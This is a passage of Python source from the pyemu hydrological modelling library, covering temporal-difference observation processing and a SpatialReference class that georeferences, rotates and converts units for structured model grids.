diff_df.loc[ins_pro_diff_df.index,"obsval"] = ins_pro_diff_df.obsval
frun_line = "pyemu.helpers.apply_temporal_diff_obs('{0}')\n".format(config_file)
return frun_line,diff_df
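# A hedged usage sketch (file names are illustrative): add difference-in-time obs
# for an existing instruction/output file pair and wire up the forward run:
#
#   pst = pyemu.Pst("my.pst")
#   frun_line, diff_df = setup_temporal_diff_obs(pst, "heads.smp.ins")
#   # append frun_line to forward_run.py and add diff_df rows to pst.observation_data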
def apply_temporal_diff_obs(config_file):
"""process an instruction-output file pair and formulate difference observations.
Args:
config_file (`str`): configuration file written by `pyemu.helpers.setup_temporal_diff_obs`.
Returns:
diff_df (`pandas.DataFrame`) : processed difference observations
Note:
writes `config_file.replace(".config",".processed")` output file that can be read
with the instruction file that is created by `pyemu.helpers.setup_temporal_diff_obs()`.
this is the companion function of `helpers.setup_temporal_diff_obs()`.
"""
if not os.path.exists(config_file):
raise Exception("apply_temporal_diff_obs() error: config_file '{0}' not found".format(config_file))
with open(config_file,'r') as f:
line = f.readline().strip().split(',')
ins_file,out_file = line[0],line[1]
diff_df = pd.read_csv(f)
if not os.path.exists(out_file):
raise Exception("apply_temporal_diff_obs() error: out_file '{0}' not found".format(out_file))
if not os.path.exists(ins_file):
raise Exception("apply_temporal_diff_obs() error: ins_file '{0}' not found".format(ins_file))
try:
ins = pyemu.pst_utils.InstructionFile(ins_file)
except Exception as e:
raise Exception("apply_temporal_diff_obs() error instantiating ins file: {0}".format(str(e)))
try:
out_df = ins.read_output_file(out_file)
except Exception as e:
raise Exception("apply_temporal_diff_obs() error processing ins-out file pair: {0}".format(str(e)))
#make sure all the listed obs names in the diff_df are in the out_df
diff_names = set(diff_df.diff1.to_list())
diff_names.update(set(diff_df.diff2.to_list()))
missing = diff_names - set(list(out_df.index.values))
if len(missing) > 0:
raise Exception("apply_temporal_diff_obs() error: the following obs names in the config file "+\
"are not in the instruction file processed outputs :" + ",".join(missing))
diff_df.loc[:,"diff1_obsval"] = out_df.loc[diff_df.diff1.values,"obsval"].values
diff_df.loc[:, "diff2_obsval"] = out_df.loc[diff_df.diff2.values, "obsval"].values
diff_df.loc[:,"diff_obsval"] = diff_df.diff1_obsval - diff_df.diff2_obsval
processed_name = config_file.replace(".config",".processed")
diff_df.loc[:, ["obsnme","diff1_obsval", "diff2_obsval", "diff_obsval"]].\
to_csv(processed_name,sep=' ',index=False)
return diff_df
# web address of spatial reference dot org
srefhttp = 'https://spatialreference.org'
class SpatialReference(object):
"""
a class to locate a structured model grid in x-y space.
Lifted wholesale from Flopy, and preserved here...
...maybe slightly over-engineered for use here
Parameters
----------
delr : numpy ndarray
the model discretization delr vector
(An array of spacings along a row)
delc : numpy ndarray
the model discretization delc vector
(An array of spacings along a column)
lenuni : int
the length units flag from the discretization package
(default 2)
xul : float
the x coordinate of the upper left corner of the grid
Enter either xul and yul or xll and yll.
yul : float
the y coordinate of the upper left corner of the grid
Enter either xul and yul or xll and yll.
xll : float
the x coordinate of the lower left corner of the grid
Enter either xul and yul or xll and yll.
yll : float
the y coordinate of the lower left corner of the grid
Enter either xul and yul or xll and yll.
rotation : float
the counter-clockwise rotation (in degrees) of the grid
proj4_str: str
a PROJ4 string that identifies the grid in space. warning: case
sensitive!
units : string
Units for the grid. Must be either feet or meters
epsg : int
EPSG code that identifies the grid in space. Can be used in lieu of
proj4. PROJ4 attribute will auto-populate if there is an internet
connection(via get_proj4 method).
See https://www.epsg-registry.org/ or spatialreference.org
length_multiplier : float
multiplier to convert model units to spatial reference units.
delr and delc above will be multiplied by this value. (default=1.)
Attributes
----------
xedge : ndarray
array of column edges
yedge : ndarray
array of row edges
xgrid : ndarray
numpy meshgrid of xedges
ygrid : ndarray
numpy meshgrid of yedges
xcenter : ndarray
array of column centers
ycenter : ndarray
array of row centers
xcentergrid : ndarray
numpy meshgrid of column centers
ycentergrid : ndarray
numpy meshgrid of row centers
vertices : 1D array
1D array of cell vertices for whole grid in C-style (row-major) order
(same as np.ravel())
Notes
-----
xul and yul can be explicitly (re)set after SpatialReference
instantiation, but only before any of the other attributes and methods are
accessed
"""
xul, yul = None, None
xll, yll = None, None
rotation = 0.
length_multiplier = 1.
origin_loc = 'ul' # or ll
defaults = {"xul": None, "yul": None, "rotation": 0.,
"proj4_str": None,
"units": None, "lenuni": 2,
"length_multiplier": None,
"source": 'defaults'}
lenuni_values = {'undefined': 0,
'feet': 1,
'meters': 2,
'centimeters': 3}
lenuni_text = {v: k for k, v in lenuni_values.items()}
def __init__(self, delr=np.array([]), delc=np.array([]), lenuni=2,
xul=None, yul=None, xll=None, yll=None, rotation=0.0,
proj4_str=None, epsg=None, prj=None, units=None,
length_multiplier=None, source=None):
for delrc in [delr, delc]:
if isinstance(delrc, float) or isinstance(delrc, int):
msg = ('delr and delc must be arrays or sequences equal in '
'length to the number of rows/columns.')
raise TypeError(msg)
self.delc = np.atleast_1d(np.array(delc)).astype(
np.float64) # * length_multiplier
self.delr = np.atleast_1d(np.array(delr)).astype(
np.float64) # * length_multiplier
if self.delr.sum() == 0 or self.delc.sum() == 0:
if xll is None or yll is None:
msg = ('Warning: no grid spacing. '
'Lower-left corner offset calculation methods require '
'arguments for delr and delc. Origin will be set to '
'upper-left')
warnings.warn(msg, PyemuWarning)
xll, yll = None, None
# xul, yul = None, None
self._lenuni = lenuni
self._proj4_str = proj4_str
#
self._epsg = epsg
# if epsg is not None:
# self._proj4_str = getproj4(self._epsg)
# self.prj = prj
# self._wkt = None
# self.crs = CRS(prj=prj, epsg=epsg)
self.supported_units = ["feet", "meters"]
self._units = units
self._length_multiplier = length_multiplier
self._reset()
self.set_spatialreference(xul, yul, xll, yll, rotation)
@property
def xll(self):
if self.origin_loc == 'll':
xll = self._xll if self._xll is not None else 0.
elif self.origin_loc == 'ul':
# calculate coords for lower left corner
xll = self._xul - (np.sin(self.theta) * self.yedge[0] *
self.length_multiplier)
return xll
@property
def yll(self):
if self.origin_loc == 'll':
yll = self._yll if self._yll is not None else 0.
elif self.origin_loc == 'ul':
# calculate coords for lower left corner
yll = self._yul - (np.cos(self.theta) * self.yedge[0] *
self.length_multiplier)
return yll
@property
def xul(self):
if self.origin_loc == 'll':
# calculate coords for upper left corner
xul = self._xll + (np.sin(self.theta) * self.yedge[0] *
self.length_multiplier)
if self.origin_loc == 'ul':
# calculate coords for lower left corner
xul = self._xul if self._xul is not None else 0.
return xul
@property
def yul(self):
if self.origin_loc == 'll':
# calculate coords for upper left corner
yul = self._yll + (np.cos(self.theta) * self.yedge[0] *
self.length_multiplier)
if self.origin_loc == 'ul':
# calculate coords for lower left corner
yul = self._yul if self._yul is not None else 0.
return yul
@property
def proj4_str(self):
proj4_str = None
if self._proj4_str is not None:
if "epsg" in self._proj4_str.lower():
if "init" not in self._proj4_str.lower():
proj4_str = "+init=" + self._proj4_str
else:
proj4_str = self._proj4_str
# set the epsg if proj4 specifies it
tmp = [i for i in self._proj4_str.split() if
'epsg' in i.lower()]
self._epsg = int(tmp[0].split(':')[1])
else:
proj4_str = self._proj4_str
elif self.epsg is not None:
proj4_str = '+init=epsg:{}'.format(self.epsg)
return proj4_str
@property
def epsg(self):
# don't reset the proj4 string here
# because proj4 attribute may already be populated
# (with more details than getprj would return)
# instead reset proj4 when epsg is set
# (on init or setattr)
return self._epsg
# @property
# def wkt(self):
# if self._wkt is None:
# if self.prj is not None:
# with open(self.prj) as src:
# wkt = src.read()
# elif self.epsg is not None:
# wkt = getprj(self.epsg)
# else:
# return None
# return wkt
# else:
# return self._wkt
@property
def lenuni(self):
return self._lenuni
def _parse_units_from_proj4(self):
units = None
try:
# need this because preserve_units doesn't seem to be
# working for complex proj4 strings. So if an
# epsg code was passed, we have no choice, but if a
# proj4 string was passed, we can just parse it
proj_str = self.proj4_str
# if "EPSG" in self.proj4_str.upper():
# import pyproj
#
# crs = pyproj.Proj(self.proj4_str,
# preserve_units=True,
# errcheck=True)
# proj_str = crs.srs
# else:
# proj_str = self.proj4_str
# http://proj4.org/parameters.html#units
# from proj4 source code
# "us-ft", "0.304800609601219", "U.S. Surveyor's Foot",
# "ft", "0.3048", "International Foot",
if "units=m" in proj_str:
units = "meters"
elif "units=ft" in proj_str or \
"units=us-ft" in proj_str or \
"to_meters:0.3048" in proj_str:
units = "feet"
return units
except:
if self.proj4_str is not None:
print(' could not parse units from {}'.format(
self.proj4_str))
@property
def units(self):
if self._units is not None:
units = self._units.lower()
else:
units = self._parse_units_from_proj4()
if units is None:
# print("warning: assuming SpatialReference units are meters")
units = 'meters'
assert units in self.supported_units
return units
@property
def length_multiplier(self):
"""
Attempt to identify multiplier for converting from
model units to sr units, defaulting to 1.
"""
lm = None
if self._length_multiplier is not None:
lm = self._length_multiplier
else:
if self.model_length_units == 'feet':
if self.units == 'meters':
lm = 0.3048
elif self.units == 'feet':
lm = 1.
elif self.model_length_units == 'meters':
if self.units == 'feet':
lm = 1 / .3048
elif self.units == 'meters':
lm = 1.
elif self.model_length_units == 'centimeters':
if self.units == 'meters':
lm = 1 / 100.
elif self.units == 'feet':
lm = 1 / 30.48
else: # model units unspecified; default to 1
lm = 1.
return lm
@property
def model_length_units(self):
return self.lenuni_text[self.lenuni]
@property
def bounds(self):
"""
Return bounding box in shapely order.
"""
xmin, xmax, ymin, ymax = self.get_extent()
return xmin, ymin, xmax, ymax
@staticmethod
def load(namefile=None, reffile='usgs.model.reference'):
"""
Attempts to load spatial reference information from
the following files (in order):
1) usgs.model.reference
2) NAM file (header comment)
3) SpatialReference.default dictionary
"""
reffile = os.path.join(os.path.split(namefile)[0], reffile)
d = SpatialReference.read_usgs_model_reference_file(reffile)
if d is not None:
return d
d = SpatialReference.attribs_from_namfile_header(namefile)
if d is not None:
return d
else:
return SpatialReference.defaults
@staticmethod
def attribs_from_namfile_header(namefile):
# check for reference info in the nam file header
d = SpatialReference.defaults.copy()
d['source'] = 'namfile'
if namefile is None:
return None
header = []
with open(namefile, 'r') as f:
for line in f:
if not line.startswith('#'):
break
header.extend(line.strip().replace(
'#', '').replace(',', ';').split(';'))
for item in header:
if "xul" in item.lower():
try:
d['xul'] = float(item.split(':')[1])
except:
print(' could not parse xul ' +
'in {}'.format(namefile))
elif "yul" in item.lower():
try:
d['yul'] = float(item.split(':')[1])
except:
print(' could not parse yul ' +
'in {}'.format(namefile))
elif "rotation" in item.lower():
try:
d['rotation'] = float(item.split(':')[1])
except:
print(' could not parse rotation ' +
'in {}'.format(namefile))
elif "proj4_str" in item.lower():
try:
proj4_str = ':'.join(item.split(':')[1:]).strip()
if proj4_str.lower() == 'none':
proj4_str = None
d['proj4_str'] = proj4_str
except:
print(' could not parse proj4_str ' +
'in {}'.format(namefile))
elif "start" in item.lower():
try:
d['start_datetime'] = item.split(':')[1].strip()
except:
print(' could not parse start ' +
'in {}'.format(namefile))
# spatial reference length units
elif "units" in item.lower():
d['units'] = item.split(':')[1].strip()
# model length units
elif "lenuni" in item.lower():
d['lenuni'] = int(item.split(':')[1].strip())
# multiplier for converting from model length units to sr length units
elif "length_multiplier" in item.lower():
d['length_multiplier'] = float(item.split(':')[1].strip())
return d
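    # Illustrative sketch (hypothetical values): the header comments parsed
    # above look like the following lines at the top of a name file, with
    # items separated by ';' or ',':
    #
    #     # xul:620000.0; yul:3350000.0; rotation:15.0
    #     # proj4_str:+proj=utm +zone=14 +units=m; start_datetime:1-1-2000
    #     # units:meters; lenuni:2; length_multiplier:1.0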
@staticmethod
def read_usgs_model_reference_file(reffile='usgs.model.reference'):
"""
read spatial reference info from the usgs.model.reference file
https://water.usgs.gov/ogw/policy/gw-model/modelers-setup.html
"""
ITMUNI = {0: "undefined", 1: "seconds", 2: "minutes", 3: "hours",
4: "days",
5: "years"}
itmuni_values = {v: k for k, v in ITMUNI.items()}
d = SpatialReference.defaults.copy()
d['source'] = 'usgs.model.reference'
# discard default to avoid confusion with epsg code if entered
d.pop('proj4_str')
if os.path.exists(reffile):
with open(reffile) as fref:
for line in fref:
if len(line) > 1:
if line.strip()[0] != '#':
info = line.strip().split('#')[0].split()
if len(info) > 1:
d[info[0].lower()] = ' '.join(info[1:])
d['xul'] = float(d['xul'])
d['yul'] = float(d['yul'])
d['rotation'] = float(d['rotation'])
# convert the model.reference text to a lenuni value
# (these are the model length units)
if 'length_units' in d.keys():
d['lenuni'] = SpatialReference.lenuni_values[d['length_units']]
if 'time_units' in d.keys():
d['itmuni'] = itmuni_values[d['time_units']]
if 'start_date' in d.keys():
start_datetime = d.pop('start_date')
if 'start_time' in d.keys():
start_datetime += ' {}'.format(d.pop('start_time'))
d['start_datetime'] = start_datetime
if 'epsg' in d.keys():
try:
d['epsg'] = int(d['epsg'])
except Exception as e:
raise Exception(
"error reading epsg code from file:\n" + str(e))
# this prioritizes epsg over proj4 if both are given
# (otherwise 'proj4' entry will be dropped below)
elif 'proj4' in d.keys():
d['proj4_str'] = d['proj4']
# drop any other items that aren't used in sr class
d = {k: v for k, v in d.items() if
k.lower() in SpatialReference.defaults.keys()
or k.lower() in {'epsg', 'start_datetime', 'itmuni',
'source'}}
return d
else:
return None
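    # Illustrative sketch of a usgs.model.reference file accepted by the
    # reader above (hypothetical values; '#' starts a comment and key/value
    # pairs are whitespace separated):
    #
    #     xul 620000.0
    #     yul 3350000.0
    #     rotation 15.0
    #     length_units meters
    #     time_units days
    #     start_date 1/1/2000
    #     start_time 00:00:00
    #     epsg 26914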
def __setattr__(self, key, value):
reset = True
if key == "delr":
super(SpatialReference, self). \
__setattr__("delr", np.atleast_1d(np.array(value)))
elif key == "delc":
super(SpatialReference, self). \
__setattr__("delc", np.atleast_1d(np.array(value)))
elif key == "xul":
super(SpatialReference, self). \
__setattr__("_xul", float(value))
self.origin_loc = 'ul'
elif key == "yul":
super(SpatialReference, self). \
__setattr__("_yul", float(value))
self.origin_loc = 'ul'
elif key == "xll":
super(SpatialReference, self). \
__setattr__("_xll", float(value))
self.origin_loc = 'll'
elif key == "yll":
super(SpatialReference, self). \
__setattr__("_yll", float(value))
self.origin_loc = 'll'
elif key == "length_multiplier":
super(SpatialReference, self). \
__setattr__("_length_multiplier", float(value))
elif key == "rotation":
super(SpatialReference, self). \
__setattr__("rotation", float(value))
elif key == "lenuni":
super(SpatialReference, self). \
__setattr__("_lenuni", int(value))
elif key == "units":
value = value.lower()
assert value in self.supported_units
super(SpatialReference, self). \
__setattr__("_units", value)
elif key == "proj4_str":
super(SpatialReference, self). \
__setattr__("_proj4_str", value)
# reset the units and epsg
units = self._parse_units_from_proj4()
if units is not None:
self._units = units
self._epsg = None
elif key == "epsg":
super(SpatialReference, self). \
__setattr__("_epsg", value)
# reset the units and proj4
# self._units = None
# self._proj4_str = getproj4(self._epsg)
# self.crs = crs(epsg=value)
elif key == "prj":
super(SpatialReference, self). \
__setattr__("prj", value)
# translation to proj4 strings in crs class not robust yet
# leave units and proj4 alone for now.
# self.crs = CRS(prj=value, epsg=self.epsg)
else:
super(SpatialReference, self).__setattr__(key, value)
reset = False
if reset:
self._reset()
def reset(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
return
def _reset(self):
self._xgrid = None
self._ygrid = None
self._ycentergrid = None
self._xcentergrid = None
self._vertices = None
return
@property
def nrow(self):
return self.delc.shape[0]
@property
def ncol(self):
return self.delr.shape[0]
def __eq__(self, other):
if not isinstance(other, SpatialReference):
return False
if other.xul != self.xul:
return False
if other.yul != self.yul:
return False
if other.rotation != self.rotation:
return False
if other.proj4_str != self.proj4_str:
return False
return True
@classmethod
def from_namfile(cls, namefile, delr=np.array([]), delc=np.array([])):
if delr is None or delc is None:
warnings.warn("One or both of grid spacing information "
"missing,\n required for most pyemu methods "
"that use sr,\n can be passed later if desired "
"(e.g. sr.delr = row spacing)", PyemuWarning)
attribs = SpatialReference.attribs_from_namfile_header(namefile)
attribs['delr'] = delr
attribs['delc'] = delc
try:
attribs.pop("start_datetime")
except:
print(' could not remove start_datetime')
return SpatialReference(**attribs)
@classmethod
def from_gridspec(cls, gridspec_file, lenuni=0):
f = open(gridspec_file, 'r')
raw = f.readline().strip().split()
nrow = int(raw[0])
ncol = int(raw[1])
raw = f.readline().strip().split()
xul, yul, rot = float(raw[0]), float(raw[1]), float(raw[2])
delr = []
j = 0
while j < ncol:
raw = f.readline().strip().split()
for r in raw:
if '*' in r:
rraw = r.split('*')
for n in range(int(rraw[0])):
delr.append(float(rraw[1]))
j += 1
else:
delr.append(float(r))
j += 1
delc = []
i = 0
while i < nrow:
raw = f.readline().strip().split()
for r in raw:
if '*' in r:
rraw = r.split('*')
for n in range(int(rraw[0])):
delc.append(float(rraw[1]))
i += 1
else:
delc.append(float(r))
i += 1
f.close()
return cls(np.array(delr), np.array(delc),
lenuni, xul=xul, yul=yul, rotation=rot)
@property
def attribute_dict(self):
return {"xul": self.xul, "yul": self.yul, "rotation": self.rotation,
"proj4_str": self.proj4_str}
def set_spatialreference(self, xul=None, yul=None, xll=None, yll=None,
rotation=0.0):
"""
set spatial reference - can be called from model instance
"""
if xul is not None and xll is not None:
msg = ('Both xul and xll entered. Please enter either xul, yul or '
'xll, yll.')
raise ValueError(msg)
if yul is not None and yll is not None:
msg = ('Both yul and yll entered. Please enter either xul, yul or '
'xll, yll.')
raise ValueError(msg)
# set the origin priority based on the left corner specified
# (the other left corner will be calculated). If none are specified
# then default to upper left
if xul is None and yul is None and xll is None and yll is None:
self.origin_loc = 'ul'
xul = 0.
yul = self.delc.sum()
elif xll is not None:
self.origin_loc = 'll'
else:
self.origin_loc = 'ul'
self.rotation = rotation
self._xll = xll if xll is not None else 0.
self._yll = yll if yll is not None else 0.
self._xul = xul if xul is not None else 0.
self._yul = yul if yul is not None else 0.
return
def __repr__(self):
s = "xul:{0:<.10G}; yul:{1:<.10G}; rotation:{2:<G}; ". \
format(self.xul, self.yul, self.rotation)
s += "proj4_str:{0}; ".format(self.proj4_str)
s += "units:{0}; ".format(self.units)
s += "lenuni:{0}; ".format(self.lenuni)
s += "length_multiplier:{}".format(self.length_multiplier)
return s
@property
def theta(self):
return -self.rotation * np.pi / 180.
@property
def xedge(self):
return self.get_xedge_array()
@property
def yedge(self):
return self.get_yedge_array()
@property
def xgrid(self):
if self._xgrid is None:
self._set_xygrid()
return self._xgrid
@property
def ygrid(self):
if self._ygrid is None:
self._set_xygrid()
return self._ygrid
@property
def xcenter(self):
return self.get_xcenter_array()
@property
def ycenter(self):
return self.get_ycenter_array()
@property
def ycentergrid(self):
if self._ycentergrid is None:
self._set_xycentergrid()
return self._ycentergrid
@property
def xcentergrid(self):
if self._xcentergrid is None:
self._set_xycentergrid()
return self._xcentergrid
def _set_xycentergrid(self):
self._xcentergrid, self._ycentergrid = np.meshgrid(self.xcenter,
self.ycenter)
self._xcentergrid, self._ycentergrid = self.transform(
self._xcentergrid,
self._ycentergrid)
def _set_xygrid(self):
self._xgrid, self._ygrid = np.meshgrid(self.xedge, self.yedge)
self._xgrid, self._ygrid = self.transform(self._xgrid, self._ygrid)
@staticmethod
def rotate(x, y, theta, xorigin=0., yorigin=0.):
"""
Given x and y array-like values calculate the rotation about an
arbitrary origin and then return the rotated coordinates. theta is in
degrees.
"""
# jwhite changed on Oct 11 2016 - rotation is now positive CCW
# theta = -theta * np.pi / 180.
theta = theta * np.pi / 180.
xrot = xorigin + np.cos(theta) * (x - xorigin) - np.sin(theta) * \
(y - yorigin)
yrot = yorigin + np.sin(theta) * (x - xorigin) + np.cos(theta) * \
(y - yorigin)
return xrot, yrot
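    # Worked example (illustrative): rotating the point (1, 0) by +90 degrees
    # counter-clockwise about the origin gives (0, 1):
    #
    #     xr, yr = SpatialReference.rotate(1., 0., theta=90.)
    #     # xr ~ 0.0, yr ~ 1.0 (up to floating-point round-off)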
def transform(self, x, y, inverse=False):
"""
Given x and y array-like values, apply rotation, scale and offset,
to convert them from model coordinates to real-world coordinates.
"""
if isinstance(x, list):
x = np.array(x)
y = np.array(y)
if not np.isscalar(x):
x, y = x.copy(), y.copy()
if not inverse:
x *= self.length_multiplier
y *= self.length_multiplier
x += self.xll
y += self.yll
x, y = SpatialReference.rotate(x, y, theta=self.rotation,
xorigin=self.xll, yorigin=self.yll)
else:
x, y = SpatialReference.rotate(x, y, -self.rotation,
self.xll, self.yll)
x -= self.xll
y -= self.yll
x /= self.length_multiplier
y /= self.length_multiplier
return x, y
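    # Illustrative sketch (hypothetical grid): model coordinates are scaled by
    # length_multiplier, offset to the lower-left corner, then rotated about
    # that corner; inverse=True undoes the round trip:
    #
    #     sr = SpatialReference(delr=np.full(10, 100.), delc=np.full(5, 100.),
    #                           xll=1000., yll=2000., rotation=30.)
    #     xr, yr = sr.transform(250., 125.)
    #     xm, ym = sr.transform(xr, yr, inverse=True)   # xm ~ 250., ym ~ 125.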
def get_extent(self):
"""
Get the extent of the rotated and offset grid
Return (xmin, xmax, ymin, ymax)
"""
x0 = self.xedge[0]
x1 = self.xedge[-1]
y0 = self.yedge[0]
y1 = self.yedge[-1]
# upper left point
x0r, y0r = self.transform(x0, y0)
# upper right point
x1r, y1r = self.transform(x1, y0)
# lower right point
x2r, y2r = self.transform(x1, y1)
# lower left point
x3r, y3r = self.transform(x0, y1)
xmin = min(x0r, x1r, x2r, x3r)
xmax = max(x0r, x1r, x2r, x3r)
ymin = min(y0r, y1r, y2r, y3r)
ymax = max(y0r, y1r, y2r, y3r)
return (xmin, xmax, ymin, ymax)
def get_grid_lines(self):
"""
Get the grid lines as a list
"""
xmin = self.xedge[0]
xmax = self.xedge[-1]
ymin = self.yedge[-1]
ymax = self.yedge[0]
lines = []
# Vertical lines
for j in range(self.ncol + 1):
x0 = self.xedge[j]
x1 = x0
y0 = ymin
y1 = ymax
x0r, y0r = self.transform(x0, y0)
x1r, y1r = self.transform(x1, y1)
lines.append([(x0r, y0r), (x1r, y1r)])
# horizontal lines
for i in range(self.nrow + 1):
x0 = xmin
x1 = xmax
y0 = self.yedge[i]
y1 = y0
x0r, y0r = self.transform(x0, y0)
x1r, y1r = self.transform(x1, y1)
lines.append([(x0r, y0r), (x1r, y1r)])
return lines
# def get_grid_line_collection(self, **kwargs):
# """
# Get a LineCollection of the grid
#
# """
# from flopy.plot import ModelMap
#
# map = ModelMap(sr=self)
# lc = map.plot_grid(**kwargs)
# return lc
def get_xcenter_array(self):
"""
Return a numpy one-dimensional float array that has the cell center x
coordinate for every column in the grid in model space - not offset or rotated.
"""
assert (self.delr is not None
and len(self.delr) > 0), ("delr not passed to "
"spatial reference object")
x = np.add.accumulate(self.delr) - 0.5 * self.delr
return x
def get_ycenter_array(self):
"""
        Return a numpy one-dimensional float array that has the cell center y
        coordinate for every row in the grid in model space - not offset or rotated.
"""
assert (self.delc is not None
and len(self.delc) > 0), ("delc not passed to "
"spatial reference object")
Ly = np.add.reduce(self.delc)
y = Ly - (np.add.accumulate(self.delc) - 0.5 *
self.delc)
return y
def get_xedge_array(self):
"""
Return a numpy one-dimensional float array that has the cell edge x
coordinates for every column in the grid in model space - not offset
or rotated. Array is of size (ncol + 1)
"""
assert (self.delr is not None
and len(self.delr) > 0), ("delr not passed to "
"spatial reference object")
xedge = np.concatenate(([0.], np.add.accumulate(self.delr)))
return xedge
def get_yedge_array(self):
"""
Return a numpy one-dimensional float array that has the cell edge y
coordinates for every row in the grid in model space - not offset or
rotated. Array is of size (nrow + 1)
"""
assert (self.delc is not None
and len(self.delc) > 0), ("delc not passed to "
"spatial reference object")
length_y = np.add.reduce(self.delc)
yedge = np.concatenate(([length_y], length_y -
np.add.accumulate(self.delc)))
return yedge
def write_gridspec(self, filename):
""" write a PEST-style grid specification file
"""
f = open(filename, 'w')
f.write(
"{0:10d} {1:10d}\n".format(self.delc.shape[0], self.delr.shape[0]))
f.write("{0:15.6E} {1:15.6E} {2:15.6E}\n".format(
self.xul * self.length_multiplier,
self.yul * self.length_multiplier,
self.rotation))
for r in self.delr:
f.write("{0:15.6E} ".format(r))
f.write('\n')
for c in self.delc:
f.write("{0:15.6E} ".format(c))
f.write('\n')
return
def get_vertices(self, i, j):
"""Get vertices for a single cell or sequence if i, j locations."""
pts = []
xgrid, ygrid = self.xgrid, self.ygrid
pts.append([xgrid[i, j], ygrid[i, j]])
pts.append([xgrid[i + 1, j], ygrid[i + 1, j]])
pts.append([xgrid[i + 1, j + 1], ygrid[i + 1, j + 1]])
pts.append([xgrid[i, j + 1], ygrid[i, j + 1]])
pts.append([xgrid[i, j], ygrid[i, j]])
if np.isscalar(i):
return pts
else:
vrts = np.array(pts).transpose([2, 0, 1])
return [v.tolist() for v in vrts]
def get_rc(self, x, y):
return self.get_ij(x, y)
def get_ij(self, x, y):
"""Return the row and column of a point or sequence of points
in real-world coordinates.
Parameters
----------
x : scalar or sequence of x coordinates
y : scalar or sequence of y coordinates
Returns
-------
i : row or sequence of rows (zero-based)
j : column or sequence of columns (zero-based)
"""
if np.isscalar(x):
c = (np.abs(self.xcentergrid[0] - x)).argmin()
r = (np.abs(self.ycentergrid[:, 0] - y)).argmin()
else:
xcp = np.array([self.xcentergrid[0]] * (len(x)))
ycp = np.array([self.ycentergrid[:, 0]] * (len(x)))
c = (np.abs(xcp.transpose() - x)).argmin(axis=0)
r = (np.abs(ycp.transpose() - y)).argmin(axis=0)
return r, c
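    # Illustrative sketch (hypothetical grid): get_ij maps real-world
    # coordinates to the zero-based row/column of the nearest cell center:
    #
    #     sr = SpatialReference(delr=np.full(4, 10.), delc=np.full(3, 10.),
    #                           xll=0., yll=0.)
    #     sr.get_ij(25., 5.)   # -> (2, 2): bottom row, third column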
# def get_grid_map_plotter(self, **kwargs):
# """
# Create a QuadMesh plotting object for this grid
#
# Returns
# -------
# quadmesh : matplotlib.collections.QuadMesh
#
# """
# from matplotlib.collections import QuadMesh
# verts = np.vstack((self.xgrid.flatten(), self.ygrid.flatten())).T
# qm = QuadMesh(self.ncol, self.nrow, verts)
# return qm
#
# def plot_array(self, a, ax=None, **kwargs):
# """
# Create a QuadMesh plot of the specified array using pcolormesh
#
# Parameters
# ----------
# a : np.ndarray
#
# Returns
# -------
# quadmesh : matplotlib.collections.QuadMesh
#
# """
# import matplotlib.pyplot as plt
# if ax is None:
# ax = plt.gca()
# qm = ax.pcolormesh(self.xgrid, self.ygrid, a, **kwargs)
# return qm
# def export_array(self, filename, a, nodata=-9999,
# fieldname='value',
# **kwargs):
# """
# Write a numpy array to Arc Ascii grid or shapefile with the
# model reference.
#
# Parameters
# ----------
# filename : str
# Path of output file. Export format is determined by
# file extension.
# '.asc' Arc Ascii grid
# '.tif' GeoTIFF (requires rasterio package)
# '.shp' Shapefile
# a : 2D numpy.ndarray
# Array to export
# nodata : scalar
# Value to assign to np.nan entries (default -9999)
# fieldname : str
# Attribute field name for array values (shapefile export only).
# (default 'values')
# kwargs:
# keyword arguments to np.savetxt (ascii)
# rasterio.open (GeoTIFF)
# or flopy.export.shapefile_utils.write_grid_shapefile2
#
# Notes
# -----
# Rotated grids will be either be unrotated prior to export,
# using scipy.ndimage.rotate (Arc Ascii format) or rotation will be
# included in their transform property (GeoTiff format). In either case
# the pixels will be displayed in the (unrotated) projected geographic coordinate system,
# so the pixels will no longer align exactly with the model grid
# (as displayed from a shapefile, for example). A key difference between
# Arc Ascii and GeoTiff (besides disk usage) is that the
# unrotated Arc Ascii will have a different grid size, whereas the GeoTiff
# will have the same number of rows and pixels as the original.
#
# """
#
# if filename.lower().endswith(".asc"):
# if len(np.unique(self.delr)) != len(np.unique(self.delc)) != 1 \
# or self.delr[0] != self.delc[0]:
# raise ValueError('Arc ascii arrays require a uniform grid.')
#
# xll, yll = self.xll, self.yll
# cellsize = self.delr[0] * self.length_multiplier
# fmt = kwargs.get('fmt', '%.18e')
# a = a.copy()
# a[np.isnan(a)] = nodata
# if self.rotation != 0:
# try:
# from scipy.ndimage import rotate
# a = rotate(a, self.rotation, cval=nodata)
# height_rot, width_rot = a.shape
# xmin, ymin, xmax, ymax = self.bounds
# dx = (xmax - xmin) / width_rot
# dy = (ymax - ymin) / height_rot
# cellsize = np.max((dx, dy))
# # cellsize = np.cos(np.radians(self.rotation)) * cellsize
# xll, yll = xmin, ymin
# except ImportError:
# print('scipy package required to export rotated grid.')
#
# filename = '.'.join(
# filename.split('.')[:-1]) + '.asc' # enforce .asc ending
# nrow, ncol = a.shape
# a[np.isnan(a)] = nodata
# txt = 'ncols {:d}\n'.format(ncol)
# txt += 'nrows {:d}\n'.format(nrow)
# txt += 'xllcorner {:f}\n'.format(xll)
# txt += 'yllcorner {:f}\n'.format(yll)
# txt += 'cellsize {}\n'.format(cellsize)
# # ensure that nodata fmt consistent w values
# txt += 'NODATA_value {}\n'.format(fmt) % (nodata)
# with open(filename, 'w') as output:
# output.write(txt)
# with open(filename, 'ab') as output:
# np.savetxt(output, a, **kwargs)
# print('wrote {}'.format(filename))
#
# elif filename.lower().endswith(".tif"):
# if len(np.unique(self.delr)) != len(np.unique(self.delc)) != 1 \
# or self.delr[0] != self.delc[0]:
# raise ValueError('GeoTIFF export require a uniform grid.')
# try:
# import rasterio
# from rasterio import Affine
# except:
# print('GeoTIFF export requires the rasterio package.')
# return
# dxdy = self.delc[0] * self.length_multiplier
# trans = Affine.translation(self.xul, self.yul) * \
# Affine.rotation(self.rotation) * \
# Affine.scale(dxdy, -dxdy)
#
# # third dimension is the number of bands
# a = a.copy()
# if len(a.shape) == 2:
# a = np.reshape(a, (1, a.shape[0], a.shape[1]))
# if a.dtype.name == 'int64':
# a = a.astype('int32')
# dtype = rasterio.int32
# elif a.dtype.name == 'int32':
# dtype = rasterio.int32
# elif a.dtype.name == 'float64':
# dtype = rasterio.float64
# elif a.dtype.name == 'float32':
# dtype = rasterio.float32
# else:
# msg = 'ERROR: invalid dtype "{}"'.format(a.dtype.name)
# raise TypeError(msg)
#
